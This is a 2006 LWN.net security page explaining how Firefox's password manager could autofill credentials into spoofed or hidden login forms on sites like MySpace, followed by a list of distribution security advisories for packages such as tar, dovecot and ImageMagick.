User: Password:
Subscribe / Log in / New account


The Firefox password manager vulnerability

November 29, 2006

This article was contributed by Jake Edge.

A commonly used convenience feature in Firefox is the password manager (PM) which can keep track of username/password pairs for sites that one visits and fills in when a new login is required. Unfortunately, as a recent bug report shows, PM can be too helpful and provide that information to other sites, invisibly to the user. As of this writing, the underlying browser problem has not been fixed, though MySpace (where the problem was originally discovered in the wild) has changed its filtering of user-supplied HTML to avoid the problem.

When visiting a site with a login form, Firefox checks its list of stored credentials to see if it has a set matching those requested by the page. How it makes that decision is the crux of the vulnerability. Currently, it looks at the domain name portion of the URL and the input field names in the login form to see if there is a match. If there is just one match, it automatically fills in the username and password and the user can just press the "Login" button to authenticate. If there are more matches, the username becomes a drop-down containing all of the possibilities. When a particular username is chosen, the associated password is filled in.

Under normal circumstances, this works fine, but attackers are always willing to alter the underlying assumptions; that is what has occurred here. For sites like MySpace that allow users to put HTML into their pages, someone with malicious intent can mimic the MySpace login page on their own page; Firefox will happily fill in the blanks on the spoofed page. Users might well believe that they had been logged off for some reason and press the login button which will then provide the credentials to whatever URL the ACTION attribute of the form points to. This new kind of attack has been called a Reverse Cross-site Request (RCSR) by Robert Chapin, who reported the Firefox bug.

This mechanism has much in common with standard phishing techniques, in that it tricks the user into sending their passwords to the attacker, but it has a few twists. A typical phishing site will not have a matching entry in the PM and therefore Firefox will not automatically fill in the form. In addition, there is no reason that the username and password fields need be visible for this attack to work; by using CSS or absolute positioning, the attacker may be able to hide the fields from the user but Firefox will happily fill them in anyway. The user will believe they are submitting a benign, unrelated form, when, in fact, they are providing their credentials to an attacker.

Other browsers are susceptible to this attack as well, but because of some user interface differences, the impact is lessened. Opera provides a 'magic wand' icon that a user can press when they want to provide their credentials to a matching site; IE7 requires one to choose the username from a drop-down (even if there is only one choice), unless the URL is exactly the same as the one stored with the password. These differences alleviate the problem with invisible form fields, but could still be used by login form mimics to trap the unwary.

The discussion of possible fixes in the bug report is instructive as there is no real panacea for this problem on the browser side. Several of the comments maintain that it is completely a server-side issue and that sites must take steps to insure that what they serve does not contain this kind of content. Unfortunately for Firefox users and developers, that simplistic approach will not suffice. The root of the problem lies in what portion of a URL is considered significant for identifying a specific site to attach credentials to in the PM.

It is interesting to note, while one is traversing the web, the different ways one can end up on a login page and the different URLs that lead to them. One way to ensure that RCSR cannot occur is to require that the URL stored with the password match exactly with the URL of the requesting page before filling in credentials. This test will break on a wide variety of web sites because they attach various parameters to the URL (navigation information for example) and doing that check would seriously degrade the usefulness of the PM. A less severe check could match the URL up to the start of any parameters, but there are some sites that use different hosts and paths for handling credentials and a user would have to store a password for each of these URLs. Checking the ACTION attribute of the form being submitted has been suggested as a potential solution, but javascript allows changing that attribute on the fly and that capability is used for legitimate reasons.

It is unclear what direction the Firefox team will take in fixing this problem, but it seems likely to require some user interface change (like Opera or IE7) so that some kind of user interaction is required before credentials are filled in. It may also include stricter checking of the page and/or action URLs before deciding to fill in credentials. Pop-up warnings for content that fails these checks has been suggested as a solution, but it is hard to envision users paying any more attention to a new warning than they have to any of the current ones. There is a delicate balance for the developers to maintain between security and convenience, especially when considering the behavior that users have come to expect.

It is hard to imagine that most users, when storing their passwords, would expect Firefox to send them off to phishing sites without any kind of user interaction and without providing any visual indication that it is doing so. Website operators should certainly be doing better filtering, but the browser is the agent that the user has entrusted with their passwords. Claiming that there is no browser issue is a serious misunderstanding of user expectations when they store passwords.

Comments (36 posted)

Brief items

Remote code execution vulnerability in ProFTPD

If any of you are still running ProFTPD: there is a new vulnerability which allows for execution of arbitrary code by a remote attacker - and an exploit is already in circulation. Upgrading to version 1.3.0a, which contains the fix, would be a very good idea. Click below for the advisory.

Full Story (comments: 15)

New vulnerabilities

apache-mod_auth_kerb: off-by-one error

Package(s):apache-mod_auth_kerb CVE #(s):CVE-2006-5989
Created:November 24, 2006 Updated:January 23, 2007
Description: An off-by-one error in the der_get_oid function in mod_auth_kerb 5.0 allows remote attackers to cause a denial of service (crash) via a crafted Kerberos message that triggers a heap-based buffer overflow in the component array.
Gentoo 200701-14 mod_auth_kerb 2007-01-22
Debian DSA-1247-1 libapache-mod-auth-kerb 2007-01-08
Red Hat RHSA-2006:0746-01 mod_auth_kerb 2006-12-06
Fedora FEDORA-2006-1341 mod_auth_kerb 2006-11-29
Mandriva MDKSA-2006:218 apache-mod_auth_kerb 2006-11-23

Comments (none posted)

dovecot: index cache file handling error

Package(s):dovecot CVE #(s):CVE-2006-5973
Created:November 29, 2006 Updated:May 8, 2007
Description: The dovecot IMAP server has an error in its index cache file handling code which could be exploited by an authenticated user to execute arbitrary code. Only servers with the (non-default) mmap_disable=yes option setting are vulnerable.
Fedora FEDORA-2006-1504 dovecot 2006-12-27
Fedora FEDORA-2006-1396 dovecot 2006-12-18
rPath rPSA-2006-0220-1 dovecot 2006-11-30
Ubuntu USN-387-1 dovecot 2006-11-28

Comments (none posted)

fvwm: fvwm-menu-directory command injection

Package(s):fvwm CVE #(s):CVE-2006-5969
Created:November 24, 2006 Updated:November 29, 2006
Description: Tavis Ormandy of the Gentoo Linux Security Audit Team discovered that fvwm-menu-directory does not sufficiently sanitize directory names prior to generating menus. A local attacker who can convince an fvwm-menu-directory user to browse a directory they control could cause fvwm commands to be executed with the privileges of the fvwm user. Fvwm commands can be used to execute arbitrary shell commands.
Gentoo 200611-17 fvwm 2006-11-23

Comments (none posted)

imagemagick: buffer overflows

Package(s):imagemagick CVE #(s):CVE-2006-5868
Created:November 28, 2006 Updated:February 16, 2007
Description: Daniel Kobras discovered multiple buffer overflows in ImageMagick's SGI file format decoder. By tricking a user or an automated system into processing a specially crafted SGI image, this could be exploited to execute arbitrary code with the user's privileges.
Red Hat RHSA-2007:0015-01 ImageMagick 2007-02-15
Mandriva MDKSA-2006:223 ImageMagick 2006-12-01
Ubuntu USN-386-1 imagemagick 2006-11-28

Comments (1 posted)

jbossas: arbitrary code execution

Package(s):jbossas CVE #(s):CVE-2006-5750
Created:November 27, 2006 Updated:November 29, 2006
Description: Symantec discovered a flaw in the DeploymentFileRepository class of the JBoss Application Server. A remote attacker who is able to access the console manager could read or write to files with the permissions of the JBoss user. This could potentially lead to arbitrary code execution as the jboss user.
Red Hat RHSA-2006:0743-01 jbossas 2006-11-27

Comments (none posted)

phpMyAdmin: several vulnerabilities

Package(s):phpMyAdmin CVE #(s):CVE-2006-3388 CVE-2006-5116 CVE-2006-5117 CVE-2006-5718
Created:November 24, 2006 Updated:November 29, 2006
Description: Several vulnerabilities have been fixed in phpMyAdmin version, including cross-site scripting and cross-site request forgery vulnerabilities.
SuSE SUSE-SA:2006:071 phpMyAdmin 2006-11-24

Comments (none posted)

pstotext: insecure file name quoting

Package(s):pstotext CVE #(s):CVE-2006-5869
Created:November 27, 2006 Updated:November 29, 2006
Description: Brian May discovered that pstotext, a utility to extract plain text from Postscript and PDF files, performs insufficient quoting of file names, which allows execution of arbitrary shell commands.
Debian DSA-1220-1 pstotext 2006-11-26

Comments (none posted)

tar: symlink vulnerability

Package(s):tar CVE #(s):CVE-2006-6097
Created:November 28, 2006 Updated:December 20, 2006
Description: Teemu Salmela discovered that tar still handles the deprecated GNUTYPE_NAMES record type. This record type could be used to create symlinks that would be followed while unpacking a tar archive. If a user or an automated system were tricked into unpacking a specially crafted tar file, arbitrary files could be overwritten with user privileges.
Red Hat RHSA-2006:0749-01 tar 2006-12-19
Gentoo 200612-10 tar 2006-12-11
OpenPKG OpenPKG-SA-2006.038 tar 2006-12-08
Slackware SSA:2006-335-01 tar 2006-12-04
Debian DSA-1223-1 tar 2006-12-01
rPath rPSA-2006-0222-1 tar 2006-11-30
Mandriva MDKSA-2006:219 tar 2006-11-28
Ubuntu USN-385-1 tar 2006-11-27

Comments (none posted)

Page editor: Jonathan Corbet
Next page: Kernel development>>

Copyright © 2006, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds